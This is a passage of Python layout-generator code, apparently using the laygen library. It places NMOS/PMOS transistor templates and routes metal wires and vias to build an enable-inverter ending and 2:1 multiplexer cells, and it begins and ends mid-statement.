xy1=xy, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip4.name) rvss = laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in4.name) # pin if create_pin == True: create_io_pin(laygen, layer=laygen.layers['pin'][3], gridname=rg_m2m3_pin, pinname_list = ['I', 'EN', 'ENB', 'O'], rect_list=[ri0, ren0, renb0, ro0]) create_power_pin(laygen, layer=laygen.layers['pin'][2], gridname=rg_m1m2, rect_vdd=rvdd, rect_vss=rvss) def generate_mux2to1_1x(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, routing_grid_m2m3, routing_grid_m1m2_pin, routing_grid_m2m3_pin, devname_nmos_boundary, devname_nmos_body_2stack, #devname_nmos_body_left, devname_nmos_body_right, devname_pmos_boundary, devname_pmos_body_2stack, #devname_pmos_body_left, devname_pmos_body_right, origin=np.array([0, 0]), create_pin=False): pg = placement_grid rg_m1m2 = routing_grid_m1m2 rg_m2m3 = routing_grid_m2m3 rg_m1m2_pin = routing_grid_m1m2_pin rg_m2m3_pin = routing_grid_m2m3_pin # placement in0 = laygen.place("I"+objectname_pfix + 'N0', devname_nmos_boundary, pg, xy=origin) #in1 = laygen.relplace(name = "I"+objectname_pfix + 'N1', templatename = devname_nmos_body_left, gridname = pg, refinstname = in0.name) #in2 = laygen.relplace(name = "I"+objectname_pfix + 'N2', templatename = devname_nmos_body_right, gridname = pg, refinstname = in1.name) in1 = laygen.relplace(name = "I"+objectname_pfix + 'N1', templatename = devname_nmos_body_2stack, gridname = pg, refinstname = in0.name) in3 = laygen.relplace(name = "I"+objectname_pfix + 'N3', templatename = devname_nmos_boundary, gridname = pg, refinstname = in1.name) in4 = laygen.relplace(name = "I"+objectname_pfix + 'N4', templatename = devname_nmos_boundary, gridname = pg, refinstname = in3.name, transform='MY') #in5 = laygen.relplace(name = "I"+objectname_pfix + 'N5', templatename = devname_nmos_body_right, gridname = pg, refinstname = in4.name, transform='MY') #in6 = laygen.relplace(name = "I"+objectname_pfix + 'N6', templatename = devname_nmos_body_left, gridname = pg, refinstname = in5.name, transform='MY') in6 = laygen.relplace(name = "I"+objectname_pfix + 'N6', templatename = devname_nmos_body_2stack, gridname = pg, refinstname = in4.name, transform='MY') in7 = laygen.relplace(name = "I"+objectname_pfix + 'N7', templatename = devname_nmos_boundary, gridname = pg, refinstname = in6.name, transform='MY') ip0 = laygen.relplace(name = "I"+objectname_pfix + 'P0', templatename = devname_pmos_boundary, gridname = pg, refinstname = in0.name, direction='top', transform='MX') #ip1 = laygen.relplace(name = "I"+objectname_pfix + 'P1', templatename = devname_pmos_body_left, gridname = pg, refinstname = ip0.name, transform='MX') #ip2 = laygen.relplace(name = "I"+objectname_pfix + 'P2', templatename = devname_pmos_body_right, gridname = pg, refinstname = ip1.name, transform='MX') ip1 = laygen.relplace(name = "I"+objectname_pfix + 'P1', templatename = devname_pmos_body_2stack, gridname = pg, refinstname = ip0.name, transform='MX') ip3 = laygen.relplace(name = "I"+objectname_pfix + 'P3', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip1.name, transform='MX') ip4 = laygen.relplace(name = "I"+objectname_pfix + 'P4', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip3.name, transform='R180') #ip5 = laygen.relplace(name = "I"+objectname_pfix + 'P5', templatename = devname_pmos_body_right, gridname = pg, refinstname = ip4.name, transform='R180') #ip6 = laygen.relplace(name = "I"+objectname_pfix + 'P6', templatename = devname_pmos_body_left, gridname = pg, refinstname = ip5.name, transform='R180') ip6 = laygen.relplace(name = "I"+objectname_pfix + 'P6', templatename = devname_pmos_body_2stack, gridname = pg, refinstname = ip4.name, transform='R180') ip7 = laygen.relplace(name = "I"+objectname_pfix + 'P7', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip6.name, transform='R180') generate_inv_1x(laygen, objectname_pfix=objectname_pfix+'INV0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3, routing_grid_m1m2_pin=rg_m1m2_pin, routing_grid_m2m3_pin=rg_m2m3_pin, devname_nmos_boundary='nmos4_fast_boundary', devname_nmos_body='nmos4_fast_center_nf1_left', devname_nmos_space='nmos4_fast_space', devname_pmos_boundary='pmos4_fast_boundary', devname_pmos_body='pmos4_fast_center_nf1_left', devname_pmos_space='pmos4_fast_space', pin_i_abut='pmos', origin=laygen.get_xy(obj = in7, gridname = pg), pin_o_y=1, create_pin=False) # in0 laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='G0', refinstname1=ip1.name, refpinname1='G0') laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 1]), xy1=np.array([2, 1]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='G0', refinstname1=in1.name, refpinname1='G0') ri0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 2]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='G0', refinstname1=in1.name, refpinname1='G0', endstyle0="extend", endstyle1="extend") laygen.via(None, np.array([0, 1]), refinstname=in1.name, refpinname='G0', gridname=rg_m1m2) laygen.via(None, np.array([0, 1]), refinstname=in1.name, refpinname='G0', gridname=rg_m2m3) # in1 laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=in6.name, refpinname0='G0', refinstname1=ip6.name, refpinname1='G0') laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 1]), xy1=np.array([2, 1]), gridname0=rg_m1m2, refinstname0=in6.name, refpinname0='G0', refinstname1=in6.name, refpinname1='G0') ri1 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 2]), gridname0=rg_m2m3, refinstname0=in6.name, refpinname0='G0', refinstname1=in6.name, refpinname1='G0', endstyle0="extend", endstyle1="extend") laygen.via(None, np.array([0, 1]), refinstname=in6.name, refpinname='G0', gridname=rg_m1m2) laygen.via(None, np.array([0, 1]), refinstname=in6.name, refpinname='G0', gridname=rg_m2m3) # en0 #laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-2, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, # refinstname0=in2.name, refpinname0='G0', refinstname1=in2.name, refpinname1='G0') #ren0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([-1, 0-1]), xy1=np.array([-1, 2]), gridname0=rg_m2m3, # refinstname0=in2.name, refpinname0='G0', refinstname1=in2.name, refpinname1='G0', # endstyle0="extend", endstyle1="extend") #laygen.via(None, np.array([0, 0]), refinstname=in2.name, refpinname='G0', gridname=rg_m1m2) #laygen.via(None, np.array([-1, 0]), refinstname=in2.name, refpinname='G0', gridname=rg_m2m3) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-2, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='G1', refinstname1=in1.name, refpinname1='G1') ren0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([-1, 0-1]), xy1=np.array([-1, 2]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='G1', refinstname1=in1.name, refpinname1='G1', endstyle0="extend", endstyle1="extend") laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='G1', gridname=rg_m1m2) laygen.via(None, np.array([-1, 0]), refinstname=in1.name, refpinname='G1', gridname=rg_m2m3) # en1 #laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-2, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, # refinstname0=in5.name, refpinname0='G0', refinstname1=in5.name, refpinname1='G0') #ren1 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([-1, 0]), xy1=np.array([-1, 2+1]), gridname0=rg_m2m3, # refinstname0=in5.name, refpinname0='G0', refinstname1=in5.name, refpinname1='G0', # endstyle0="extend", endstyle1="extend") #laygen.via(None, np.array([0, 0]), refinstname=in5.name, refpinname='G0', gridname=rg_m1m2) #laygen.via(None, np.array([-1, 0]), refinstname=in5.name, refpinname='G0', gridname=rg_m2m3) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-2, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=in6.name, refpinname0='G1', refinstname1=in6.name, refpinname1='G1') ren1 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([-1, 0]), xy1=np.array([-1, 2+1]), gridname0=rg_m2m3, refinstname0=in6.name, refpinname0='G1', refinstname1=in6.name, refpinname1='G1', endstyle0="extend", endstyle1="extend") laygen.via(None, np.array([0, 0]), refinstname=in6.name, refpinname='G1', gridname=rg_m1m2) laygen.via(None, np.array([-1, 0]), refinstname=in6.name, refpinname='G1', gridname=rg_m2m3) # enb0 #laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-2, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, # refinstname0=ip2.name, refpinname0='G0', refinstname1=ip2.name, refpinname1='G0') #renb0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0-1]), xy1=np.array([0, 2]), gridname0=rg_m2m3, # refinstname0=ip2.name, refpinname0='G0', refinstname1=ip2.name, refpinname1='G0', # endstyle0="extend", endstyle1="extend") #laygen.via(None, np.array([0, 0]), refinstname=ip2.name, refpinname='G0', gridname=rg_m1m2) #laygen.via(None, np.array([0, 0]), refinstname=ip2.name, refpinname='G0', gridname=rg_m2m3) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-2, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=ip1.name, refpinname0='G1', refinstname1=ip1.name, refpinname1='G1') renb0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0-1]), xy1=np.array([0, 2]), gridname0=rg_m2m3, refinstname0=ip1.name, refpinname0='G1', refinstname1=ip1.name, refpinname1='G1', endstyle0="extend", endstyle1="extend") laygen.via(None, np.array([0, 0]), refinstname=ip1.name, refpinname='G1', gridname=rg_m1m2) laygen.via(None, np.array([0, 0]), refinstname=ip1.name, refpinname='G1', gridname=rg_m2m3) # enb1 #laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-2, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, # refinstname0=ip5.name, refpinname0='G0', refinstname1=ip5.name, refpinname1='G0') #renb1 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 2+1]), gridname0=rg_m2m3, # refinstname0=ip5.name, refpinname0='G0', refinstname1=ip5.name, refpinname1='G0', # endstyle0="extend", endstyle1="extend") #laygen.via(None, np.array([0, 0]), refinstname=ip5.name, refpinname='G0', gridname=rg_m1m2) #laygen.via(None, np.array([0, 0]), refinstname=ip5.name, refpinname='G0', gridname=rg_m2m3) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-2, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=ip6.name, refpinname0='G1', refinstname1=ip6.name, refpinname1='G1') renb1 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 2+1]), gridname0=rg_m2m3, refinstname0=ip6.name, refpinname0='G1', refinstname1=ip6.name, refpinname1='G1', endstyle0="extend", endstyle1="extend") laygen.via(None, np.array([0, 0]), refinstname=ip6.name, refpinname='G1', gridname=rg_m1m2) laygen.via(None, np.array([0, 0]), refinstname=ip6.name, refpinname='G1', gridname=rg_m2m3) # en/enb cross couple #laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 0-1]), xy1=np.array([0, -1]), gridname0=rg_m2m3, # refinstname0=in2.name, refpinname0='G0', refinstname1=in5.name, refpinname1='G0') #laygen.via(None, np.array([-1, -1]), refinstname=in2.name, refpinname='G0', gridname=rg_m2m3) #laygen.via(None, np.array([0, -1]), refinstname=in5.name, refpinname='G0', gridname=rg_m2m3) #laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0-1]), xy1=np.array([-1, -1]), gridname0=rg_m2m3, # refinstname0=ip2.name, refpinname0='G0', refinstname1=ip5.name, refpinname1='G0') #laygen.via(None, np.array([0, -1]), refinstname=ip2.name, refpinname='G0', gridname=rg_m2m3) #laygen.via(None, np.array([-1, -1]), refinstname=ip5.name, refpinname='G0', gridname=rg_m2m3) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 0-1]), xy1=np.array([0, -1]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='G1', refinstname1=in6.name, refpinname1='G1') laygen.via(None, np.array([-1, -1]), refinstname=in1.name, refpinname='G1', gridname=rg_m2m3) laygen.via(None, np.array([0, -1]), refinstname=in6.name, refpinname='G1', gridname=rg_m2m3) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0-1]), xy1=np.array([-1, -1]), gridname0=rg_m2m3, refinstname0=ip1.name, refpinname0='G1', refinstname1=ip6.name, refpinname1='G1') laygen.via(None, np.array([0, -1]), refinstname=ip1.name, refpinname='G1', gridname=rg_m2m3) laygen.via(None, np.array([-1, -1]), refinstname=ip6.name, refpinname='G1', gridname=rg_m2m3) # output #laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, # refinstname0=in2.name, refpinname0='D0', refinstname1=in5.name, refpinname1='D0') #laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, # refinstname0=ip2.name, refpinname0='D0', refinstname1=ip5.name, refpinname1='D0') #ro0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([1, 0]), xy1=np.array([1, 0]), gridname0=rg_m2m3, # refinstname0=in2.name, refpinname0='D0', refinstname1=ip2.name, refpinname1='D0') #laygen.via(None, np.array([0, 0]), refinstname=in2.name, refpinname='D0', gridname=rg_m1m2) #laygen.via(None, np.array([0, 0]), refinstname=ip2.name, refpinname='D0', gridname=rg_m1m2) #laygen.via(None, np.array([0, 0]), refinstname=in5.name, refpinname='D0', gridname=rg_m1m2) #laygen.via(None, np.array([0, 0]), refinstname=ip5.name, refpinname='D0', gridname=rg_m1m2) #laygen.via(None, np.array([1, 0]), refinstname=in2.name, refpinname='D0', gridname=rg_m2m3) #laygen.via(None, np.array([1, 0]), refinstname=ip2.name, refpinname='D0', gridname=rg_m2m3) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='D0', refinstname1=in6.name, refpinname1='D0') laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=ip1.name, refpinname0='D0', refinstname1=ip6.name, refpinname1='D0') ro0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([1, 0]), xy1=np.array([1, 0]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='D0', refinstname1=ip6.name, refpinname1='D0') laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='D0', gridname=rg_m1m2) laygen.via(None, np.array([0, 0]), refinstname=ip1.name, refpinname='D0', gridname=rg_m1m2) laygen.via(None, np.array([0, 0]), refinstname=in6.name, refpinname='D0', gridname=rg_m1m2) laygen.via(None, np.array([0, 0]), refinstname=ip6.name, refpinname='D0', gridname=rg_m1m2) laygen.via(None, np.array([1, 0]), refinstname=in6.name, refpinname='D0', gridname=rg_m2m3) laygen.via(None, np.array([1, 0]), refinstname=ip6.name, refpinname='D0', gridname=rg_m2m3) #muxoutput to inverter input #laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, # refinstname0=in2.name, refpinname0='D0', refinstname1="I"+objectname_pfix+"INV0N1", refpinname1='G0', # direction="x") laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='D0', refinstname1="I" + objectname_pfix + "INV0N1", refpinname1='G0', direction="x") laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, -2]), gridname0=rg_m2m3, refinstname0="I" + objectname_pfix + "INV0N1", refpinname0='G0', refinstname1="I" + objectname_pfix + "INV0N1", refpinname1='G0') laygen.via(None, np.array([0, -2]), refinstname="I" + objectname_pfix + "INV0N1", refpinname='G0', gridname=rg_m2m3) #mux output ro0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 1]), xy1=np.array([0, 1]), gridname0=rg_m2m3, refinstname0="I" + objectname_pfix + "INV0N1", refpinname0='D0', refinstname1="I" + objectname_pfix + "INV0P1", refpinname1='D0') # power and ground route xy_s0 = laygen.get_template_pin_xy(in1.cellname, 'S0', rg_m1m2)[0, :] laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=xy_s0 * np.array([1, 0]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='S0', refinstname1=in1.name) laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=xy_s0 * np.array([1, 0]), gridname0=rg_m1m2, refinstname0=ip1.name, refpinname0='S0', refinstname1=ip1.name) laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=xy_s0 * np.array([1, 0]), gridname0=rg_m1m2, refinstname0=in6.name, refpinname0='S0', refinstname1=in6.name) laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=xy_s0 * np.array([1, 0]), gridname0=rg_m1m2, refinstname0=ip6.name, refpinname0='S0', refinstname1=ip6.name) laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=in1.name, gridname=rg_m1m2) laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=ip1.name, gridname=rg_m1m2) laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=in6.name, gridname=rg_m1m2) laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=ip6.name, gridname=rg_m1m2) # power and groud rail rvdd = laygen.route("R" + objectname_pfix +"VDD0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([laygen.get_xy(obj=laygen.get_template(name = devname_pmos_boundary), gridname = rg_m1m2)[0], 0]), gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1="I" + objectname_pfix + "INV0P3") rvss = laygen.route("R" + objectname_pfix +"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([laygen.get_xy(obj=laygen.get_template(name = devname_pmos_boundary), gridname = rg_m1m2)[0], 0]), gridname0=rg_m1m2, refinstname0=in0.name, refinstname1="I" + objectname_pfix + "INV0N3") # pin if create_pin == True: create_io_pin(laygen, layer=laygen.layers['pin'][3], gridname=rg_m2m3_pin, pinname_list = ['I0', 'I1', 'EN0', 'EN1', 'O'], rect_list=[ri0, ri1, ren0, renb0, ro0]) create_power_pin(laygen, layer=laygen.layers['pin'][2], gridname=rg_m1m2, rect_vdd=rvdd, rect_vss=rvss) def generate_mux2to1(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, routing_grid_m2m3, routing_grid_m3m4, routing_grid_m1m2_pin, routing_grid_m2m3_pin, devname_nmos_boundary, devname_nmos_body, devname_nmos_space, devname_pmos_boundary, devname_pmos_body, devname_pmos_space, m=2, origin=np.array([0, 0]), create_pin=False): """generate 2:1 mux""" pg = placement_grid rg_m1m2 = routing_grid_m1m2 rg_m2m3 = routing_grid_m2m3 rg_m3m4 = routing_grid_m3m4 rg_m1m2_pin = routing_grid_m1m2_pin rg_m2m3_pin = routing_grid_m2m3_pin m=max(1, int(m/2)) #using nf=2 devices # placement in0 = laygen.place("I"+objectname_pfix + 'N0', devname_nmos_boundary, pg, xy=origin) in1 = laygen.relplace(name = "I"+objectname_pfix + 'N1', templatename = devname_nmos_body, gridname = pg, refinstname = in0.name, shape=np.array([m, 1])) in1a = laygen.relplace(name = "I"+objectname_pfix + 'N1A', templatename = devname_nmos_boundary, gridname = pg, refinstname = in1.name) in1b = laygen.relplace(name = "I"+objectname_pfix + 'N1B', templatename = devname_nmos_boundary, gridname = pg, refinstname = in1a.name) in2 = laygen.relplace(name = "I"+objectname_pfix + 'N2', templatename = devname_nmos_body, gridname = pg, refinstname = in1b.name, shape=np.array([m, 1])) in3 = laygen.relplace(name = "I"+objectname_pfix + 'N3', templatename = devname_nmos_boundary, gridname = pg, refinstname = in2.name) in_rte = laygen.relplace(name = "I"+objectname_pfix + 'NRTE', templatename = devname_nmos_space, gridname = pg, refinstname = in3.name, shape=np.array([4, 1])) in4 = laygen.relplace(name = "I"+objectname_pfix + 'N4', templatename = devname_nmos_boundary, gridname = pg, refinstname = in_rte.name, transform='MY') in5 = laygen.relplace(name = "I"+objectname_pfix + 'N5', templatename = devname_nmos_body, gridname = pg, refinstname = in4.name, transform='MY', shape=np.array([m, 1])) in5a = laygen.relplace(name = "I"+objectname_pfix + 'N5A', templatename = devname_nmos_boundary, gridname = pg, refinstname = in5.name, transform='MY') in5b = laygen.relplace(name = "I"+objectname_pfix + 'N5B', templatename = devname_nmos_boundary, gridname = pg, refinstname = in5a.name, transform='MY') in6 = laygen.relplace(name = "I"+objectname_pfix + 'N6', templatename = devname_nmos_body, gridname = pg, refinstname = in5b.name, transform='MY', shape=np.array([m, 1])) in7 = laygen.relplace(name = "I"+objectname_pfix + 'N7', templatename = devname_nmos_boundary, gridname = pg, refinstname = in6.name, transform='MY') in8 = laygen.relplace(name = "I"+objectname_pfix + 'N8', templatename = devname_nmos_boundary, gridname = pg, refinstname = in7.name) in9 = laygen.relplace(name = "I"+objectname_pfix + 'N9', templatename = devname_nmos_body, gridname = pg, refinstname = in8.name, shape=np.array([m, 1])) in10 = laygen.relplace(name = "I"+objectname_pfix + 'N10', templatename = devname_nmos_boundary, gridname = pg, refinstname = in9.name) ip0 = laygen.relplace(name = "I"+objectname_pfix + 'P0', templatename = devname_pmos_boundary, gridname = pg, refinstname = in0.name, direction='top', transform='MX') ip1 = laygen.relplace(name = "I"+objectname_pfix + 'P1', templatename = devname_pmos_body, gridname = pg, refinstname = ip0.name, transform='MX', shape=np.array([m, 1])) ip1a = laygen.relplace(name = "I"+objectname_pfix + 'P1A', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip1.name, transform='MX') ip1b = laygen.relplace(name = "I"+objectname_pfix + 'P1B', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip1a.name, transform='MX') ip2 = laygen.relplace(name = "I"+objectname_pfix + 'P2', templatename = devname_pmos_body, gridname = pg, refinstname = ip1b.name, transform='MX', shape=np.array([m, 1])) ip3 = laygen.relplace(name = "I"+objectname_pfix + 'P3', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip2.name, transform='MX') ip_rte = laygen.relplace(name = "I"+objectname_pfix + 'PRTE', templatename = devname_pmos_space, gridname = pg, refinstname = ip3.name, shape=np.array([4, 1]), transform='MX') ip4 = laygen.relplace(name = "I"+objectname_pfix + 'P4', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip_rte.name, transform='R180') ip5 = laygen.relplace(name = "I"+objectname_pfix + 'P5', templatename = devname_pmos_body, gridname = pg, refinstname = ip4.name, transform='R180', shape=np.array([m, 1])) ip5a = laygen.relplace(name = "I"+objectname_pfix + 'P5A', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip5.name, transform='R180') ip5b = laygen.relplace(name = "I"+objectname_pfix + 'P5B', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip5a.name, transform='R180') ip6 = laygen.relplace(name = "I"+objectname_pfix + 'P6', templatename = devname_pmos_body, gridname = pg, refinstname = ip5b.name, transform='R180', shape=np.array([m, 1])) ip7 = laygen.relplace(name = "I"+objectname_pfix + 'P7', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip6.name, transform='R180') ip8 = laygen.relplace(name = "I"+objectname_pfix + 'P8', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip7.name, transform='MX') ip9 = laygen.relplace(name = "I"+objectname_pfix + 'P9', templatename = devname_pmos_body, gridname = pg, refinstname = ip8.name, transform='MX', shape=np.array([m, 1])) ip10 = laygen.relplace(name = "I"+objectname_pfix + 'P10', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip9.name, transform='MX') # in0 for i in range(m): laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='G0', refinstindex0=np.array([i, 0]), refinstname1=ip1.name, refpinname1='G0', refinstindex1=np.array([i, 0]), ) laygen.via(None, np.array([0, 1]), refinstname=in1.name, refpinname='G0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) if m==1: laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 1]), xy1=np.array([1, 1]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='G0', refinstindex0=np.array([0, 0]), refinstname1=in1.name, refpinname1='G0', refinstindex1=np.array([m-1, 0]), endstyle0="extend", endstyle1="extend") ri0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([-1, 0]), xy1=np.array([-1, 2]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='G0', refinstname1=in1.name, refpinname1='G0') laygen.via(None, np.array([-1, 1]), refinstname=in1.name, refpinname='G0', gridname=rg_m2m3) else: laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 1]), xy1=np.array([0, 1]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='G0', refinstindex0=np.array([0, 0]), refinstname1=in1.name, refpinname1='G0', refinstindex1=np.array([m-1, 0])) ri0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 2]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='G0', refinstname1=in1.name, refpinname1='G0') laygen.via(None, np.array([0, 1]), refinstname=in1.name, refpinname='G0', gridname=rg_m2m3) # in1 for i in range(m): laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=in6.name, refpinname0='G0', refinstindex0=np.array([i, 0]), refinstname1=ip6.name, refpinname1='G0', refinstindex1=np.array([i, 0]), ) laygen.via(None, np.array([0, 1]), refinstname=in6.name, refpinname='G0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) if m==1: laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 1]), xy1=np.array([1, 1]), gridname0=rg_m1m2, refinstname0=in6.name, refpinname0='G0', refinstindex0=np.array([0, 0]), refinstname1=in6.name, refpinname1='G0', refinstindex1=np.array([m-1, 0]), endstyle0="extend", endstyle1="extend") ri1 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([-1, 0]), xy1=np.array([-1, 2]), gridname0=rg_m2m3, refinstname0=in6.name, refpinname0='G0', refinstname1=in6.name, refpinname1='G0') laygen.via(None, np.array([-1, 1]), refinstname=in6.name, refpinname='G0', gridname=rg_m2m3) else: laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 1]), xy1=np.array([0, 1]), gridname0=rg_m1m2, refinstname0=in6.name, refpinname0='G0', refinstindex0=np.array([0, 0]), refinstname1=in6.name, refpinname1='G0', refinstindex1=np.array([m-1, 0])) ri1 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 2]), gridname0=rg_m2m3, refinstname0=in6.name, refpinname0='G0', refinstname1=in6.name, refpinname1='G0') laygen.via(None, np.array([0, 1]), refinstname=in6.name, refpinname='G0', gridname=rg_m2m3) # en0 for i in range(m): laygen.via(None, np.array([0, 0]), refinstname=in2.name, refpinname='G0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) ren0_m2 = laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([4, 0]), gridname0=rg_m1m2, refinstname0=in2.name, refpinname0='G0', refinstindex0=np.array([0, 0]), refinstname1=in2.name, refpinname1='G0', refinstindex1=np.array([m - 1, 0])) # en1 for i in range(m): laygen.via(None, np.array([0, 0]), refinstname=in5.name, refpinname='G0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) ren1_m2 = laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([2, 0]), gridname0=rg_m1m2, refinstname0=in5.name, refpinname0='G0', refinstindex0=np.array([0, 0]), refinstname1=in5.name, refpinname1='G0', refinstindex1=np.array([m - 1, 0])) # enb0 for i in range(m): laygen.via(None, np.array([0, 0]), refinstname=ip2.name, refpinname='G0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) renb0_m2 = laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([2, 0]), gridname0=rg_m1m2, refinstname0=ip2.name, refpinname0='G0', refinstindex0=np.array([0, 0]), refinstname1=ip2.name, refpinname1='G0', refinstindex1=np.array([m - 1, 0])) # enb1 for i in range(m): laygen.via(None, np.array([0, 0]), refinstname=ip5.name, refpinname='G0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) renb1_m2 = laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([4, 0]), gridname0=rg_m1m2, refinstname0=ip5.name, refpinname0='G0', refinstindex0=np.array([0, 0]), refinstname1=ip5.name, refpinname1='G0', refinstindex1=np.array([m - 1, 0])) # internal connection between stacked mos laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 1]), xy1=np.array([0, 1]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='D0', refinstname1=in2.name, refpinname1='D0', refinstindex1=np.array([m - 1, 0])) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 1]), 